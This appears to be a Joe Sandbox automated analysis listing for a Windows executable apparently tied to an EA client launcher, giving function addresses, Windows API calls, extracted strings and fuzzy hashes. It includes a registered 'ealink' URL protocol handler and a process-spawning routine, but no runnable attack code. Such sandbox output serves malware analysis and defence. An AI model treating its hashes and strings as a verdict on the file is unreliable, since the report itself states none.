                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: 4d8af5c93ff15b13b4fc166f70c7e948e7880cd261db61d00fb0d6653f235f6a
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 7E112B77205C81C3D654866DD8B46F7A395FBC6320B3C43FBD0418BB58D23AA9C59D08
                                                                                                                                                      Function 00406810 Relevance: 63.2, APIs: 1, Strings: 35, Instructions: 210libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: AgentAdd$AgentRemove$AgentTaskAdd$AgentTaskRemove$AgentTaskStatusGet$AgentTaskStatusSet$Command$Connect$Connect3$Disconnect$IsConnected$ItemClearCache$ItemDecryptCancel$ItemDecryptStart$ItemDownloadCancel$ItemDownloadStart$ItemDownloadTogglePauseState$ItemEnumPatches$ItemGetStatus$ItemInstallStart$ItemInstallStartBatch$ItemUnpackCancel$ItemUnpackStart$ItemUse$StateGet$StateSetProperty$StateSetTag$Unable to locate required %s$UserEnumContent$UserGetEntitlements$UserGetNames$UserIsLoggedIn$UserLogin$UserLogout$ViewSetContentFilters
                                                                                                                                                      • API String ID: 1029625771-469933569
                                                                                                                                                      • Opcode ID: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                                                                                                      • Instruction ID: 9fa1f707f8fb64ba1f71a20fb7b6fa33dd77cac9be6680ed116804a284e664ba
                                                                                                                                                      • Opcode Fuzzy Hash: 188e2270707432a5962ec1fd5cf00e03fe9ea02481facc80de23009df005a4e4
                                                                                                                                                      • Instruction Fuzzy Hash: CB71E170B212209BDB14BB75AA04A9A32D9EF45314F82943FE143B73D1DBBD9C148B9C
                                                                                                                                                      Function 00403820 Relevance: 45.9, APIs: 18, Strings: 8, Instructions: 358stringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404010: __wcsicoll.LIBCMT ref: 004040D6
                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(EACORECLI_SPAWNED,00000010,00000200,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403918
                                                                                                                                                      • _wcsnlen.LIBCMT ref: 00403936
                                                                                                                                                        • Part of subcall function 00406810: LoadLibraryW.KERNEL32(?,00000010,?,?,?,?,00000000,00000000), ref: 00406849
                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A03
                                                                                                                                                      • lstrcpyW.KERNEL32(?,00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A22
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A29
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A3E
                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,C6FB9493,00000000,?,00000001,004299A0,00000000,00425219,000000FF), ref: 00403A45
                                                                                                                                                      • lstrcpyW.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00403A8E
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A95
                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403A98
                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,00000000,00000000), ref: 00403AA8
                                                                                                                                                      • GetStartupInfoW.KERNEL32 ref: 00403AEE
                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 00403AF4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$Environment$Stringslstrcpy$CommandFreeInfoLibraryLineLoadStartupVariable__wcsicoll_wcsnlen
                                                                                                                                                      • String ID: %s environment variable found, entering blocking mode$%s=1$-wait option is set, entering blocking mode$D$EACORECLI_SPAWNED$Failed to launch handler process. %s$Handler process successfully spawned$wait
                                                                                                                                                      • API String ID: 2447714805-1081694395
                                                                                                                                                      • Opcode ID: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                                                                                                      • Instruction ID: 6d00ab7843f541fbbc14f52a0966576ff50e96e8f61d5f7a95a8d4ff5e0bb530
                                                                                                                                                      • Opcode Fuzzy Hash: 7a124c851049d3f06802cae96bf49cbf3fc812b641ea475440534917832cb425
                                                                                                                                                      • Instruction Fuzzy Hash: 64D1D1712083409FD315DF28C845B5BBBE4BFC9318F048A2EF589A72D1D778A945CB9A
                                                                                                                                                      Function 00403D10 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 242registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(80000000,ealink,00000000,00000000,00000000,000F003F,00000000,?,?,?,00000004), ref: 00403D98
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000004), ref: 00403E11
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,URL:ealink protocol,00000028,?,?,?,?,00000004), ref: 00403E5E
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,URL Protocol,00000000,00000001,00429530,00000002,?,?,00000004), ref: 00403E7B
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,DefaultIcon,?), ref: 00403E90
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,?,00000004), ref: 00403ED8
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000004), ref: 00403EE1
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,shell,?), ref: 00403EF6
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(?,open,00000004), ref: 00403F17
                                                                                                                                                      • RegCreateKeyW.ADVAPI32(00000004,command,?), ref: 00403F34
                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000002,?,?,?,?,00000004), ref: 00403F74
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000004), ref: 00403F7D
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000004,?,?,00000004), ref: 00403F86
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F8F
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000004), ref: 00403F98
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreate$Value$FileModuleName
                                                                                                                                                      • String ID: "%s" "%%1" -wait$"%s",-%u$DefaultIcon$URL Protocol$URL:$URL:ealink protocol$command$ealink$open$shell
                                                                                                                                                      • API String ID: 562726067-3366672052
                                                                                                                                                      • Opcode ID: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                                                                                                      • Instruction ID: 2d17851c17755659bb6fed31c70a1752706c36ece24bc0cbc964e87f1143786b
                                                                                                                                                      • Opcode Fuzzy Hash: 29258b752a715726cb2019f92678dc0124f5f0abd6b8a6cad12d52febe84ad78
                                                                                                                                                      • Instruction Fuzzy Hash: 8E91E271B00215AFD724CF68DC89FAAB3B8FF88710F108299E505A72D0D774AE45CB94
                                                                                                                                                      Function 0041698A Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004157AE), ref: 00416992
                                                                                                                                                      • __mtterm.LIBCMT ref: 0041699E
                                                                                                                                                        • Part of subcall function 004166D7: DecodePointer.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 004166E8
                                                                                                                                                        • Part of subcall function 004166D7: TlsFree.KERNEL32(FFFFFFFF,00416B00,?,004157AE), ref: 00416702
                                                                                                                                                        • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(00000000,00000000,76EE5810,?,00416B00,?,004157AE), ref: 0041B487
                                                                                                                                                        • Part of subcall function 004166D7: _free.LIBCMT ref: 0041B48A
                                                                                                                                                        • Part of subcall function 004166D7: DeleteCriticalSection.KERNEL32(FFFFFFFF,76EE5810,?,00416B00,?,004157AE), ref: 0041B4B1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004169B4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004169C1
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004169CE
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004169DB
                                                                                                                                                      • TlsAlloc.KERNEL32(?,004157AE), ref: 00416A2B
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,004157AE), ref: 00416A46
                                                                                                                                                      • __init_pointers.LIBCMT ref: 00416A50
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A61
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A6E
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A7B
                                                                                                                                                      • EncodePointer.KERNEL32(?,004157AE), ref: 00416A88
                                                                                                                                                      • DecodePointer.KERNEL32(0041685B,?,004157AE), ref: 00416AA9
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00416ABE
                                                                                                                                                      • DecodePointer.KERNEL32(00000000,?,004157AE), ref: 00416AD8
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00416AEA
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      • API String ID: 3698121176-3819984048
                                                                                                                                                      • Opcode ID: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                                                                                                      • Instruction ID: 914d0277f797a2f4816733ac280e4db07d06b593b3d291f74573943c4e1e268e
                                                                                                                                                      • Opcode Fuzzy Hash: b28ab0302830108e0582c0ac885daa21842f7bb8de2b3c263851f268a6a83a45
                                                                                                                                                      • Instruction Fuzzy Hash: C031737190C2209AD720AF75BC06B6A3EA5AF45360715967BE800D33B0DBBAD841CF5C
                                                                                                                                                      Function 00416888 Relevance: 21.1, APIs: 14, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 00416888
                                                                                                                                                        • Part of subcall function 0041444C: HeapFree.KERNEL32(00000000,00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414462
                                                                                                                                                        • Part of subcall function 0041444C: GetLastError.KERNEL32(00000000,?,00416832,00000000,?,?,00414408,004136EF), ref: 00414474
                                                                                                                                                      • _free.LIBCMT ref: 00416896
                                                                                                                                                      • _free.LIBCMT ref: 004168A4
                                                                                                                                                      • _free.LIBCMT ref: 004168B2
                                                                                                                                                      • _free.LIBCMT ref: 004168C0
                                                                                                                                                      • _free.LIBCMT ref: 004168CE
                                                                                                                                                      • _free.LIBCMT ref: 004168DF
                                                                                                                                                      • __lock.LIBCMT ref: 004168E7
                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004168F9
                                                                                                                                                      • _free.LIBCMT ref: 0041690C
                                                                                                                                                      • __lock.LIBCMT ref: 00416920
                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 00416935
                                                                                                                                                      • ___freetlocinfo.LIBCMT ref: 00416951
                                                                                                                                                      • _free.LIBCMT ref: 00416964
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _free$__lock$DecrementErrorFreeHeapInterlockedLast___freetlocinfo___removelocaleref
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 829874470-0
                                                                                                                                                      • Opcode ID: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                                                                                                      • Instruction ID: 8c3e26e593937771846b6c374c4ed5737222b072e88b7e4844ed73f8815af00e
                                                                                                                                                      • Opcode Fuzzy Hash: 3b1cb0cbd6c1d9e81b3a1f771ab6ccc93afb538172364e193a824c50ba1e1e20
                                                                                                                                                      • Instruction Fuzzy Hash: 072160B22052005BDA247BBAA4457AF63E86F84728B2A851FF40497291DF3CE9C0852D
                                                                                                                                                      Function 0041F469 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 226COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041F47B
                                                                                                                                                        • Part of subcall function 00413492: __getptd.LIBCMT ref: 004134A5
                                                                                                                                                        • Part of subcall function 00414403: __getptd_noexit.LIBCMT ref: 00414403
                                                                                                                                                      • __shift.LIBCMT ref: 0041F4E9
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 0041F53D
                                                                                                                                                      • _memmove.LIBCMT ref: 0041F5A1
                                                                                                                                                      • __invoke_watson.LIBCMT ref: 0041F5C4
                                                                                                                                                      • __fltout2.LIBCMT ref: 0041F5F9
                                                                                                                                                        • Part of subcall function 00420C33: ___dtold.LIBCMT ref: 00420C59
                                                                                                                                                        • Part of subcall function 00420C33: _$I10_OUTPUT.LIBCMT ref: 00420C74
                                                                                                                                                        • Part of subcall function 00420C33: _strcpy_s.LIBCMT ref: 00420C94
                                                                                                                                                      • __fptostr.LIBCMT ref: 0041F657
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Locale_strcpy_s$I10_UpdateUpdate::____dtold__fltout2__fptostr__getptd__getptd_noexit__invoke_watson__shift_memmove
                                                                                                                                                      • String ID: -$e+000
                                                                                                                                                      • API String ID: 2872883240-1412363215
